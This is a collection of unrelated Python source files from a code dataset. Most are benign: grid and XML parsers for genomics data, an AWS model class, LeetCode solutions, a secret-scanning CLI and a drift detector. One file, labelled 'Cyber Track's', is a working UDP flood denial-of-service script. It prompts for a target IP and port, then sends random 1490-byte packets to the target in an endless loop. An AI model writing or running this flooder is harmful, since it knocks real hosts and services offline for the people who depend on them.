if arr[i][j] == 1:
areas.append(dfs(arr, i, j))
islands += 1
return islands, areas
def boxes(arr):
# https://docs.opencv.org/3.4/dd/d49/tutorial_py_contour_features.html
pass
def calculate(image):
binaryImage = preprocess(image)
islands, areas = calc(binaryImage)
# box = boxes(image)
return islands, areas, binaryImage
if __name__ == '__main__':
arr = np.array([
[1, 1, 0, 0, 0],
[1, 1, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 1, 1]
])
islands, area = calc(arr)
print("Islands : ", islands)
print("Area list: ", area)
| StarcoderdataPython |
1669327 | from collections import namedtuple
from nameko.extensions import DependencyProvider
class ServiceDependencyProvider(DependencyProvider):
def make_dependency(self, **services):
return namedtuple('{}Dependency'.format(self.__class__.__name__), services.keys())(**services)
def get_dependency(self, worker_ctx):
return self.make_dependency(**getattr(self, 'services', {}))
| StarcoderdataPython |
171925 | # xml.py
# ------------------------------------------------------------------------------------------------ #
def indent(elem, level=0):
i = "\n" + level*" "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
indent(elem, level+1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
class SudokuGridXMLFailure(Exception):
pass
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ParsePoolListFromXML(inputPoolList, delimeter=','):
outputList = inputPoolList.strip().split(delimeter)
return outputList
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CheckPoolDefinitionsInXMLFile(prPoolElements, pcPoolElements, rowPoolElements, colPoolElements):
if len(prPoolElements) != 1:
ex = SudokuGridXMLFailure('Number of prPool entries wrong')
raise ex
else:
prPools = ParsePoolListFromXML(prPoolElements[0].text)
if len(pcPoolElements) != 1:
ex = SudokuGridXMLFailure('Number of pcPool entries wrong')
raise ex
else:
pcPools = ParsePoolListFromXML(pcPoolElements[0].text)
if len(rowPoolElements) != 1:
ex = SudokuGridXMLFailure('Number of rowPool entries wrong')
raise ex
else:
rowPools = ParsePoolListFromXML(rowPoolElements[0].text)
if len(colPoolElements) != 1:
ex = SudokuGridXMLFailure('Number of colPool entries wrong')
raise ex
else:
colPools = ParsePoolListFromXML(colPoolElements[0].text)
return prPools, pcPools, rowPools, colPools
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ImportSudokuCoordFromXML(xmlCoordObject):
from .grid import SudokuGenomicCoord
import pdb
coord = float(xmlCoordObject.attrib['coord'])
locatability = str(xmlCoordObject.attrib['locatability'])
readCount = float(xmlCoordObject.attrib['readCount'])
try:
locatabilityScore = float(xmlCoordObject.attrib['locatabilityScore'])
except:
locatabilityScore = str(xmlCoordObject.attrib['locatabilityScore'])
try:
featureName = str(xmlCoordObject.attrib['featureName'])
featureName = featureName.split('//')
except:
featureName = []
try:
dists = str(xmlCoordObject.attrib['distanceFromFeatureTranslationStart'])
dists = dists.split(',')
for dist in dists:
dist = int(dist)
except:
dists = []
try:
fracDists = str(xmlCoordObject.attrib['fracDistanceFromFeatureTranslationStart'])
fracDists = fracDists.split(',')
for dist in fracDists:
dist = float(dist)
except:
fracDists = []
try:
locusTags = str(xmlCoordObject.attrib['locusTag'])
locusTags = locusTags.split(',')
except:
locusTags = []
gCoord = SudokuGenomicCoord(int(coord), locatability, locatabilityScore, \
int(readCount))
gCoord.featureName = featureName
gCoord.distanceFromFeatureTranslationStart = dists
gCoord.fracDistanceFromFeatureTranslationStart = fracDists
gCoord.locusTag = locusTags
return gCoord
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ImportSudokuWellFromXML(xmlWellObject):
from .grid import SudokuWell
plateName = xmlWellObject.attrib['plateName']
row = xmlWellObject.attrib['row']
col = xmlWellObject.attrib['col']
libraryAddress = xmlWellObject.attrib['libraryAddress']
od = float(xmlWellObject.attrib['od'])
plateRow = xmlWellObject.attrib['plateRow']
plateCol = xmlWellObject.attrib['plateCol']
sudokuWell = SudokuWell(plateName, plateRow, plateCol, row, col, OD=od)
sudokuWell.libraryAddress = libraryAddress
gCoords = xmlWellObject.findall('genomicCoord')
for gCoord in gCoords:
sudokuCoord = ImportSudokuCoordFromXML(gCoord)
sudokuWell.readAlignmentCoords.append(sudokuCoord)
addressSystems = xmlWellObject.findall('addressSystem')
for addressSystem in addressSystems:
name = addressSystem.attrib['name']
coordsElements = addressSystem.findall('coords')
if len(coordsElements) != 1:
ex = SudokuGridXMLFailure('Too many coords!')
raise ex
else:
coordsDict = {}
for key in coordsElements[0].attrib.keys():
coordsDict[key] = coordsElements[0].attrib[key]
sudokuWell.addressDict[name] = coordsDict
return sudokuWell
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ImportSudokuColonyPurifiedWellFromXML(xmlWellObject):
from .isitinthere import SudokuColonyPurifiedWell
from ast import literal_eval
plateName = xmlWellObject.attrib['plateName']
row = xmlWellObject.attrib['row']
col = xmlWellObject.attrib['col']
libraryAddress = xmlWellObject.attrib['libraryAddress']
od = float(xmlWellObject.attrib['od'])
plateRow = xmlWellObject.attrib['plateRow']
plateCol = xmlWellObject.attrib['plateCol']
# Attributes specific to SudokuColonyPurifiedWell
condensationType = str(xmlWellObject.attrib['condensationType'])
hopedForCoord = int(xmlWellObject.attrib['hopedForCoord'])
hopedForPresent = literal_eval(xmlWellObject.attrib['hopedForPresent'])
sudokuWell = SudokuColonyPurifiedWell(plateName, plateRow, plateCol, row, col, OD=od)
sudokuWell.libraryAddress = libraryAddress
sudokuWell.condensationType = condensationType
sudokuWell.hopedForCoord = hopedForCoord
sudokuWell.hopedForPresent = hopedForPresent
gCoords = xmlWellObject.findall('genomicCoord')
for gCoord in gCoords:
sudokuCoord = ImportSudokuCoordFromXML(gCoord)
sudokuWell.readAlignmentCoords.append(sudokuCoord)
addressSystems = xmlWellObject.findall('addressSystem')
for addressSystem in addressSystems:
name = addressSystem.attrib['name']
coordsElements = addressSystem.findall('coords')
if len(coordsElements) != 1:
ex = SudokuGridXMLFailure('Too many coords!')
raise ex
else:
coordsDict = {}
for key in coordsElements[0].attrib.keys():
coordsDict[key] = coordsElements[0].attrib[key]
sudokuWell.addressDict[name] = coordsDict
return sudokuWell
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ImportSudokuPlateFromXML(plateElement, expectedRows=[], expectedCols=[], \
expectedPlateName=None, expectedPlateRow=None, expectedPlateCol=None, \
useSudokuColonyPurifiedWells=False):
import pdb
from .grid import SudokuPlate
if expectedRows == []:
rows = plateElement.attrib['rows'].split(',')
else:
rows = expectedRows
if expectedCols == []:
cols = plateElement.attrib['cols'].split(',')
else:
cols = expectedCols
if expectedPlateName == None:
plateName = plateElement.attrib['plateName']
else:
plateName = expectedPlateName
if expectedPlateRow == None:
plateRow = plateElement.attrib['plateRow']
else:
plateRow = expectedPlateRow
if expectedPlateCol == None:
plateCol = plateElement.attrib['plateCol']
else:
plateCol = expectedPlateCol
sudokuPlate = SudokuPlate(plateName, plateRow, plateCol, rows, cols)
rowElements = plateElement.findall('row')
i = 0
while i < len(rowElements):
colElements = rowElements[i].findall('col')
currentRow = rowElements[i].attrib['row']
for colElement in colElements:
currentCol = colElement.attrib['col']
# print(plateName + '_' + currentRow + currentCol)
wellElements = colElement.findall('well')
if len(wellElements) != 1:
ex = SudokuGridXMLFailure('Number of well entries is wrong!')
raise ex
else:
if useSudokuColonyPurifiedWells == True:
well = ImportSudokuColonyPurifiedWellFromXML(wellElements[0])
else:
well = ImportSudokuWellFromXML(wellElements[0])
sudokuPlate.wellGrid[currentRow][currentCol] = well
i += 1
return sudokuPlate
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ImportSudokuGridFromXML(fileName, useSudokuColonyPurifiedWells=False):
import xml.etree.ElementTree as ET
from .grid import InitializeEmptySudokuGridLookupDict
tree = ET.parse(fileName)
root = tree.getroot()
tempSudokuGrid = {}
# Import the grid layout, including plate rows, plate columns, rows and columns
prPoolElements = root.findall('prPools')
pcPoolElements = root.findall('pcPools')
rowPoolElements = root.findall('rowPools')
colPoolElements = root.findall('colPools')
prPools, pcPools, rowPools, colPools = \
CheckPoolDefinitionsInXMLFile(prPoolElements, pcPoolElements, rowPoolElements, colPoolElements)
sudokuGridLookupDict = InitializeEmptySudokuGridLookupDict(prPools, pcPools, rowPools, colPools)
# Start at the level of plate rows
plateRowElements = root.findall('PR')
for pr in plateRowElements:
plateRow = str(pr.attrib['plateRow'])
plateColElements = pr.findall('PC')
for pc in plateColElements:
plateCol = str(pc.attrib['plateCol'])
plateElements = pc.findall('plate')
if len(plateElements) != 1:
ex = SudokuGridXMLFailure('Number of plate entries is greater than 1')
raise ex
else:
plate = ImportSudokuPlateFromXML(plateElements[0], \
useSudokuColonyPurifiedWells=useSudokuColonyPurifiedWells)
sudokuGridLookupDict[plateRow][plateCol] = plate
return sudokuGridLookupDict, prPools, pcPools, rowPools, colPools
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ExportListForXML(listToExport, delimeter=','):
outputStr = ''
i = 0
while i < len(listToExport):
outputStr += str(listToExport[i])
if i < len(listToExport) - 1:
outputStr += delimeter
i += 1
return outputStr
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ExportSudokuGridToXML(sudokuGridLookupDict, plateRowPools, plateColPools, rowPools, colPools, \
fileName, useSudokuColonyPurifiedWells=False):
import xml.etree.ElementTree as ET
sudokuGridTreeRoot = ET.Element('grid')
prPoolSubElement = ET.SubElement(sudokuGridTreeRoot, 'prPools')
prPoolSubElement.text = ExportListForXML(plateRowPools)
pcPoolSubElement = ET.SubElement(sudokuGridTreeRoot, 'pcPools')
pcPoolSubElement.text = ExportListForXML(plateColPools)
rowPoolSubElement = ET.SubElement(sudokuGridTreeRoot, 'rowPools')
rowPoolSubElement.text = ExportListForXML(rowPools)
colPoolSubElement = ET.SubElement(sudokuGridTreeRoot, 'colPools')
colPoolSubElement.text = ExportListForXML(colPools)
for prKey in plateRowPools:
PRSubElement = ET.SubElement(sudokuGridTreeRoot, 'PR')
PRSubElement.set('plateRow', prKey)
pcPoolKeys = sorted(sudokuGridLookupDict[prKey].keys())
for pcKey in plateColPools:
PCSubElement = ET.SubElement(PRSubElement, 'PC')
PCSubElement.set('plateCol', pcKey)
sudokuPlate = sudokuGridLookupDict[prKey][pcKey]
ExportSudokuPlateAsXMLSubElement(PCSubElement, sudokuPlate, rowPools=rowPools, \
colPools=colPools, useSudokuColonyPurifiedWells=useSudokuColonyPurifiedWells)
indent(sudokuGridTreeRoot)
sudokuGridTree = ET.ElementTree(sudokuGridTreeRoot)
sudokuGridTree.write(fileName)
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ExportSudokuPlateAsXMLSubElement(parent, plate, rowPools=[], colPools=[], \
useSudokuColonyPurifiedWells=False):
import xml.etree.ElementTree as ET
plateName = plate.plateName
plateSubElement = ET.SubElement(parent, 'plate')
plateSubElement.set('plateName', str(plateName))
plateSubElement.set('plateRow', str(plate.plateRow))
plateSubElement.set('plateCol', str(plate.plateCol))
wellGrid = plate.wellGrid
if len(rowPools) == 0:
rows = sorted(wellGrid.keys())
else:
rows = rowPools
if len(colPools) == 0:
cols = wellGrid[0].keys()
else:
cols = colPools
plateSubElement.set('rows', ExportListForXML(rows))
plateSubElement.set('cols', ExportListForXML(cols))
for row in rows:
rowSubElement = ET.SubElement(plateSubElement, 'row')
rowSubElement.set('row', str(row))
for col in cols:
colSubElement = ET.SubElement(rowSubElement, 'col')
colSubElement.set('col', str(col))
well = plate.wellGrid[row][col]
if useSudokuColonyPurifiedWells == False:
ExportSudokuWellAsXMLSubElement(colSubElement, well)
else:
ExportSudokuColonyPurifiedWellAsXMLSubElement(colSubElement, well)
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ExportSudokuColonyPurifiedWellAsXMLSubElement(parent, well):
import xml.etree.ElementTree as ET
plateName = well.plateName
row = well.row
col = well.col
libraryAddress = well.libraryAddress
OD = well.OD
readAlignmentCoords = well.readAlignmentCoords
plateRow = well.plateRow
plateCol = well.plateCol
addressDict = well.addressDict
addressDictKeys = addressDict.keys()
# Variables specific to SudokuColonyPurifiedWell
hasPredictionForContents = well.hasPredictionForContents
predictionsForContents = well.predictionsForContents
predictionCorrect = well.predictionCorrect
hopedForPresent = well.hopedForPresent
hopedForCoord = well.hopedForCoord
simplifiedReadAlignmentCoords = well.simplifiedReadAlignmentCoords
simplifiedLikelyReadAlignmentCoords = well.simplifiedLikelyReadAlignmentCoords
likelyReadAlignmentCoords = well.likelyReadAlignmentCoords
progenitorContents = well.progenitorContents
progenitorLocatabilities = well.progenitorLocatabilities
condensationType = well.condensationType
wellSubElement = ET.SubElement(parent, 'well')
wellSubElement.set('plateName', str(plateName))
wellSubElement.set('row', str(row))
wellSubElement.set('col', str(col))
wellSubElement.set('libraryAddress', str(libraryAddress))
wellSubElement.set('od', str(OD))
wellSubElement.set('plateRow', str(plateRow))
wellSubElement.set('plateCol', str(plateCol))
# Sub elements specific to SudokuColonyPurifiedWell
wellSubElement.set('condensationType', str(condensationType))
wellSubElement.set('hopedForCoord', str(hopedForCoord))
wellSubElement.set('hopedForPresent', str(hopedForPresent))
for key in addressDictKeys:
addressSubElement = ET.SubElement(wellSubElement, 'addressSystem')
addressSubElement.set('name', str(key))
coordSubElement = ET.SubElement(addressSubElement, 'coords')
for coordKey in addressDict[key].keys():
coordSubElement.set(coordKey, str(addressDict[key][coordKey]))
for gCoord in readAlignmentCoords:
ExportSudokuCoordAsXMLSubElement(wellSubElement, gCoord)
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ExportSudokuWellAsXMLSubElement(parent, well):
import xml.etree.ElementTree as ET
plateName = well.plateName
row = well.row
col = well.col
libraryAddress = well.libraryAddress
OD = well.OD
readAlignmentCoords = well.readAlignmentCoords
plateRow = well.plateRow
plateCol = well.plateCol
addressDict = well.addressDict
addressDictKeys = addressDict.keys()
wellSubElement = ET.SubElement(parent, 'well')
wellSubElement.set('plateName', str(plateName))
wellSubElement.set('row', str(row))
wellSubElement.set('col', str(col))
wellSubElement.set('libraryAddress', str(libraryAddress))
wellSubElement.set('od', str(OD))
wellSubElement.set('plateRow', str(plateRow))
wellSubElement.set('plateCol', str(plateCol))
for key in addressDictKeys:
addressSubElement = ET.SubElement(wellSubElement, 'addressSystem')
addressSubElement.set('name', str(key))
coordSubElement = ET.SubElement(addressSubElement, 'coords')
for coordKey in addressDict[key].keys():
coordSubElement.set(coordKey, str(addressDict[key][coordKey]))
for gCoord in readAlignmentCoords:
ExportSudokuCoordAsXMLSubElement(wellSubElement, gCoord)
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ExportSudokuCoordAsXMLSubElement(parent, gCoord):
import xml.etree.ElementTree as ET
gCoordSubElement = ET.SubElement(parent, 'genomicCoord')
gCoordSubElement.set('coord', str(gCoord.coord))
gCoordSubElement.set('locatability', str(gCoord.locatability))
gCoordSubElement.set('locatabilityScore', str(gCoord.locatabilityScore))
gCoordSubElement.set('readCount', str(gCoord.readCount))
gCoordSubElement.set('featureName', ExportListForXML(gCoord.featureName, delimeter=','))
gCoordSubElement.set('distanceFromFeatureTranslationStart', \
ExportListForXML(gCoord.distanceFromFeatureTranslationStart, delimeter=','))
gCoordSubElement.set('fracDistanceFromFeatureTranslationStart', \
ExportListForXML(gCoord.fracDistanceFromFeatureTranslationStart, delimeter=','))
gCoordSubElement.set('locusTag', ExportListForXML(gCoord.locusTag, delimeter=','))
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ExportFeatureTagDictAsXMLSubElement(parent, tagDict):
import xml.etree.ElementTree as ET
tagDictKeys = tagDict.keys()
tagDictSubElement = ET.SubElement(parent, 'tagDict')
for key in tagDictKeys:
tagSubElement = ET.SubElement(tagDictSubElement, key)
tagSubElement.text = ExportListForXML(tagDict[key], delimeter=',')
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ExportGeneFeatureArrayToXML(geneFeatureArray, fileName):
import xml.etree.ElementTree as ET
geneFeatureTreeRoot = ET.Element('genes')
i = 0
while i < len(geneFeatureArray):
feature = geneFeatureArray[i]
coordinates = feature.coordinates
featureType = feature.featureType
featureName = feature.featureName
startCoord = feature.startCoord
endCoord = feature.endCoord
startTranslation = feature.startTranslation
endTranslation = feature.endTranslation
tagDict = feature.tagDict
featureSubElement = ET.SubElement(geneFeatureTreeRoot, 'gene')
featureSubElement.set('coordinates', coordinates)
featureSubElement.set('featureType', featureType)
featureSubElement.set('featureName', featureName)
featureSubElement.set('startCoord', str(startCoord))
featureSubElement.set('endCoord', str(endCoord))
featureSubElement.set('startTranslation', str(startTranslation))
featureSubElement.set('endTranslation', str(endTranslation))
for well in feature.sudokuGridEntries:
ExportSudokuWellAsXMLSubElement(featureSubElement, well)
for well in feature.rearrayedGridEntries:
ExportSudokuRearrayedWellAsXMLSubElement(featureSubElement, well)
ExportFeatureTagDictAsXMLSubElement(featureSubElement, feature.tagDict)
i += 1
indent(geneFeatureTreeRoot)
geneFeatureTree = ET.ElementTree(geneFeatureTreeRoot)
geneFeatureTree.write(fileName)
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ImportTagDictFromXML(xmlTagDicts):
import pdb
tagDict = {}
for dict in xmlTagDicts:
for child in dict:
tagDictKeys = tagDict.keys()
if child.tag not in tagDictKeys:
tagDict[child.tag] = [child.text]
elif child.tag in tagDictKeys:
tagDict[child.tag].append(child.text)
# pdb.set_trace()
return tagDict
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ImportFeatureArrayFromXML(fileName):
import xml.etree.ElementTree as ET
tree = ET.parse(fileName)
root = tree.getroot()
geneFeatureArray = []
features = root.findall('gene')
for feature in features:
coordinates = feature.attrib['coordinates']
featureType = feature.attrib['featureType']
geneFeature = Feature3(featureType, coordinates)
geneFeature.featureName = feature.attrib['featureName']
geneFeature.startCoord = int(feature.attrib['startCoord'])
geneFeature.endCoord = int(feature.attrib['endCoord'])
geneFeature.startTranslation = int(feature.attrib['startTranslation'])
geneFeature.endTranslation = int(feature.attrib['endTranslation'])
sudokuWells = feature.findall('well')
for well in sudokuWells:
sudokuWell = ImportSudokuWellFromXML(well)
geneFeature.sudokuGridEntries.append(sudokuWell)
sudokuRearrayedWells = feature.findall('rearrayedWell')
for well in sudokuRearrayedWells:
sudokuRearrayedWell = ImportSudokuRearrayedWellFromXML(well)
geneFeature.rearrayedGridEntries.append(sudokuRearrayedWell)
tagDicts = feature.findall('tagDict')
tagDict = ImportTagDictFromXML(tagDicts)
geneFeature.tagDict = tagDict
geneFeatureArray.append(geneFeature)
return geneFeatureArray
# ------------------------------------------------------------------------------------------------ # | StarcoderdataPython |
3362185 | from __future__ import absolute_import, division, print_function
from cfn_model.model.ModelElement import ModelElement
class EC2Instance(ModelElement):
"""
Ecs instance model
"""
def __init__(self, cfn_model):
"""
Initialize
:param cfn_model:
"""
# attr_accessor :security_groups
ModelElement.__init__(self, cfn_model)
self.securityGroupIds= []
self.networkInterfaces= []
self.security_groups= []
self.resource_type = 'AWS::EC2::Instance'
| StarcoderdataPython |
1730878 | import argparse
argparser = argparse.ArgumentParser("python argparse_example.py")
argparser.add_argument('-n', '--no-confirm',
action='store_true', dest="no_confirm",
help="Skip confirming deletion of existing dotfiles " +
"that would be overwritten")
if __name__ == '__main__':
args = argparser.parse_args()
print args.no_confirm
| StarcoderdataPython |
3221424 | from pytube import YouTube
import os
def download_video(url, name):
try:
# cria uma instância de YouTube
yt = YouTube(url)
# seta o nome do vídeo
yt.set_filename(name)
# obtém o diretório corrente
curr_dir = os.path.dirname(os.path.abspath(__file__))
# seleciona por mp4 e pela mais alta resolução
video = yt.filter('mp4')[-1]
# salva o vídeo no diretório corrente
video.download(curr_dir)
return True
except:
return False | StarcoderdataPython |
1627885 | <gh_stars>0
def uniquePath2(obstacleGrid: list):
"""
Este algoritmo resuelve el siguiente ejercicio:
Unique Path II
https://leetcode.com/problems/unique-paths-ii/
Este algoritmo retorna el número de caminos únicos que puede seguir un robot
para llegar a la meta. El robot se ubica en la posición superior izquierda y
la meta en la posición inferior derecha de un arreglo. El arreglo
representa un mapa con caminos (0) y obstáculos (1).
"""
OBSTACLE = 1
roads = [[0 for y in x] for x in obstacleGrid]
m = len(roads)
n = len(roads[0])
if obstacleGrid[0][0] == OBSTACLE:
return 0
if m == 1 and n == 1:
return 1
roads[0][0] = 1
for col in range(1, n):
if obstacleGrid[0][col] != OBSTACLE:
left = roads[0][col - 1]
roads[0][col] = left
for row in range(1, m):
for col in range(n):
if obstacleGrid[row][col] != OBSTACLE:
top = roads[row - 1][col]
left = roads[row][col - 1]
roads[row][col] = top + left
return roads[-1][-1]
def display(a):
"""
Este programa imprime de forma ordenada las filas y columnas de un arreglo
bidimensional.
"""
for i in a:
print(i)
# Test
obstacles = [
[0, 0, 0],
[0, 1, 0],
[0, 0, 0]]
display(obstacles)
print(f'uniquePath2(obstacles): {uniquePath2(obstacles)}\n')
obstacles = [
[0, 0, 0, 1, 1],
[0, 1, 0, 1, 0],
[0, 0, 0, 0, 0]]
display(obstacles)
print(f'uniquePath2(obstacles): {uniquePath2(obstacles)}\n')
obstacles = [
[0, 0, 0, 0, 1],
[0, 1, 0, 0, 1],
[0, 1, 1, 0, 1],
[0, 0, 0, 0, 0]]
display(obstacles)
print(f'uniquePath2(obstacles): {uniquePath2(obstacles)}\n')
obstacles = [
[0, 0, 0],
[0, 1, 0],
[0, 0, 0],
[1, 0, 1],
[0, 0, 0]]
display(obstacles)
print(f'uniquePath2(obstacles): {uniquePath2(obstacles)}\n')
obstacles = [
[0, 0, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 1, 0],
[0, 0, 0, 1, 0],
[1, 1, 0, 0, 0]]
display(obstacles)
print(f'uniquePath2(obstacles): {uniquePath2(obstacles)}\n') | StarcoderdataPython |
3382106 | <filename>Dataset/Leetcode/valid/12/578.py
class Solution(object):
def XXX(self, num):
out = []
def getN (num,str1):
if num == 0:
out.append(str1)
return
if num >= 1000:
getN(num-1000,str1+'M')
elif num >= 900:
getN(num-900,str1+"CM")
elif num >= 500:
getN(num-500,str1+"D")
elif num >=400:
getN(num-400,str1+"CD")
elif num>=100:
getN(num-100,str1+'C')
elif num>=90:
getN(num-90,str1+"XC")
elif num >= 50:
getN(num-50,str1+"L")
elif num>=40:
getN(num-40,str1+"XL")
elif num >= 10:
getN(num-10,str1+"X")
elif num == 9:
out.append(str1+"IX")
return
elif num >=5:
getN(num-5,str1+"V")
elif num == 4:
out.append(str1+"IV")
return
else:
getN(num-1,str1+"I")
getN(num,'')
return out[0]
| StarcoderdataPython |
168508 | from .traj_conv import TrajConvFunction, TrajConv
__all__ = ['TrajConvFunction', 'TrajConv']
| StarcoderdataPython |
190760 | # -*- coding: utf-8 -*-
__author__ = "<NAME>"
__copyright__ = "<NAME>"
__license__ = "mit"
| StarcoderdataPython |
93771 | <filename>#Cyber Track's.py
#Cyber Track's
#modulos
import sys
import time
import socket
import random
import os
#codigo de tiempo
from datetime import datetime
now = datetime.now()
year = now.year
day = now.day
hour = now.hour
minute = now.minute
month = now.month
#colores
G = "\033[16m"
D = "\033[16m"
T = "\033[39m"
cy = "\033[38;2;23;147;299m"
A = "\033[16m"
m = "\033[16m"
ac = "\033[16m"
##########
sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
bytes = random._urandom(1490)
##########
print(ac)
os.system("clear")
print("""
█▀▀ █▄█ █▄▄ █▀▀ █▀█ ▀█▀ █▀█ ▄▀█ █▀▀ █▄▀
█▄▄ ░█░ █▄█ ██▄ █▀▄ ░█░ █▀▄ █▀█ █▄▄ █░█
""")
print(f"Disfruta la herramienta;3")
print ("Tik Tok: Joke_707")
print
print(cy)
ip = input("Ingresa La Direccion Ip: ")
port = eval(input("Ingresa El Puerto: "))
os.system("clear")
print(" Cyber Track Ddos ")
print("0% ")
time.sleep(1)
print(" 5%")
time.sleep(1)
print("10%")
time.sleep(1)
print("30% ")
time.sleep(2)
print(" 50% ")
time.sleep(1)
print(" 75%")
time.sleep(5)
print(" 100% ")
time.sleep(10)
#color
G = "\003[6086m"
print(G)
sent = 0
while True:
sock.sendto(bytes,(ip,port))
sent = sent + 1
print("Cyber Track's' : sent %s packet to %s throught port:%s"%(sent,ip,port)) | StarcoderdataPython |
1758619 | <gh_stars>100-1000
import argparse
import logging
import os
from credentialdigger import PgClient, SqliteClient
from dotenv import load_dotenv
from . import (add_rules, get_discoveries, scan, scan_path,
scan_snapshot, scan_user, scan_wiki)
logger = logging.getLogger(__name__)
class customParser(argparse.ArgumentParser):
def error(self, message):
logger.error(f'{message}\n')
self.print_help()
exit()
def main(sys_argv):
# Main parser configuration
main_parser = customParser('credentialdigger')
subparsers = main_parser.add_subparsers()
# Common parsers configuration
parser_dotenv = customParser(add_help=False)
parser_dotenv.add_argument(
'--dotenv', type=str, default=None,
help='The path to the .env file which will be used in all \
commands. If not specified, the one in the current directory will \
be used (if present).')
parser_sqlite = customParser(add_help=False)
parser_sqlite.add_argument(
'--sqlite', type=str, default=None,
help='If specified, scan the repo using the sqlite client \
passing as argument the path of the db. Otherwise, use postgres \
(must be up and running)')
parser_scan_base = customParser(add_help=False)
parser_scan_base.add_argument(
'--category', default=None, type=str,
help='If specified, scan the repo using all the rules of this \
category, otherwise use all the rules in the db')
parser_scan_base.add_argument(
'--models', default=None, nargs='+',
help='A list of models for the ML false positives detection.\nCannot \
accept empty lists.')
parser_scan_base.add_argument(
'--debug', action='store_true',
help='Flag used to decide whether to visualize the progressbars \
during the scan (e.g., during the insertion of the detections in \
the db)')
# add_rules subparser configuration
parser_add_rules = subparsers.add_parser(
'add_rules', help='Add scanning rules from a file to the database',
parents=[parser_dotenv, parser_sqlite])
add_rules.configure_parser(parser_add_rules)
# scan subparser configuration
parser_scan = subparsers.add_parser(
'scan', help='Scan a git repository',
parents=[parser_dotenv, parser_sqlite, parser_scan_base])
scan.configure_parser(parser_scan)
# scan_user subparser configuration
parser_scan_user = subparsers.add_parser(
'scan_user', help='Scan a GitHub user',
parents=[parser_dotenv, parser_sqlite, parser_scan_base])
scan_user.configure_parser(parser_scan_user)
# scan_wiki subparser configuration
parser_scan_wiki = subparsers.add_parser(
'scan_wiki', help='Scan the wiki of a repository',
parents=[parser_dotenv, parser_sqlite, parser_scan_base])
scan_wiki.configure_parser(parser_scan_wiki)
# scan_path subparser configuration
parser_scan_path = subparsers.add_parser(
'scan_path', help='Scan a local directory',
parents=[parser_dotenv, parser_sqlite, parser_scan_base])
scan_path.configure_parser(parser_scan_path)
# scan_snapshot subparser configuration
parser_scan_snapshot = subparsers.add_parser(
'scan_snapshot', help='Scan the snapshot of a repository',
parents=[parser_dotenv, parser_sqlite, parser_scan_base])
scan_snapshot.configure_parser(parser_scan_snapshot)
# get_discoveries subparser configuration
parser_get_discoveries = subparsers.add_parser(
'get_discoveries', help='Get discoveries of a scanened repository',
parents=[parser_dotenv, parser_sqlite])
get_discoveries.configure_parser(parser_get_discoveries)
# Run the parser
if len(sys_argv) == 1:
main_parser.print_help()
exit()
args = main_parser.parse_args(sys_argv[1:])
# If specified, load dotenv from the given path. Otherwise load from cwd
load_dotenv(dotenv_path=args.dotenv, verbose=True)
if args.func in [
add_rules.run,
get_discoveries.run,
scan.run,
scan_user.run,
scan_wiki.run,
scan_path.run,
scan_snapshot.run
]:
# Connect to db only when running commands that need it
if args.sqlite:
client = SqliteClient(args.sqlite)
logger.info('Database in use: Sqlite')
else:
client = PgClient(dbname=os.getenv('POSTGRES_DB'),
dbuser=os.getenv('POSTGRES_USER'),
dbpassword=os.getenv('POSTGRES_PASSWORD'),
dbhost=os.getenv('DBHOST'),
dbport=os.getenv('DBPORT'))
logger.info('Database in use: Postgres')
args.func(client, args)
else:
args.func(args)
| StarcoderdataPython |
83963 | <reponame>AndreFCruz/scikit-multiflow<filename>src/skmultiflow/drift_detection/ddm.py
import numpy as np
from skmultiflow.drift_detection.base_drift_detector import BaseDriftDetector
class DDM(BaseDriftDetector):
""" DDM method for concept drift detection
Parameters
----------
min_num_instances: int (default=30)
The minimum required number of analyzed samples so change can be
detected. This is used to avoid false detections during the early
moments of the detector, when the weight of one sample is important.
warning_level: float (default=2.0)
Warning Level
out_control_level: float (default=3.0)
Out-control Level
Notes
-----
DDM (Drift Detection Method) [1]_ is a concept change detection method
based on the PAC learning model premise, that the learner's error rate
will decrease as the number of analysed samples increase, as long as the
data distribution is stationary.
If the algorithm detects an increase in the error rate, that surpasses
a calculated threshold, either change is detected or the algorithm will
warn the user that change may occur in the near future, which is called
the warning zone.
The detection threshold is calculated in function of two statistics,
obtained when `(pi + si)` is minimum:
* `pmin`: The minimum recorded error rate.
* `smin`: The minimum recorded standard deviation.
At instant `i`, the detection algorithm uses:
* `pi`: The error rate at instant i.
* `si`: The standard deviation at instant i.
The conditions for entering the warning zone and detecting change are
as follows:
* if `pi + si >= pmin + 2 * smin` -> Warning zone
* if `pi + si >= pmin + 3 * smin` -> Change detected
References
----------
.. [1] <NAME>, <NAME>, <NAME>, <NAME>: Learning
with Drift Detection. SBIA 2004: 286-295
Examples
--------
>>> # Imports
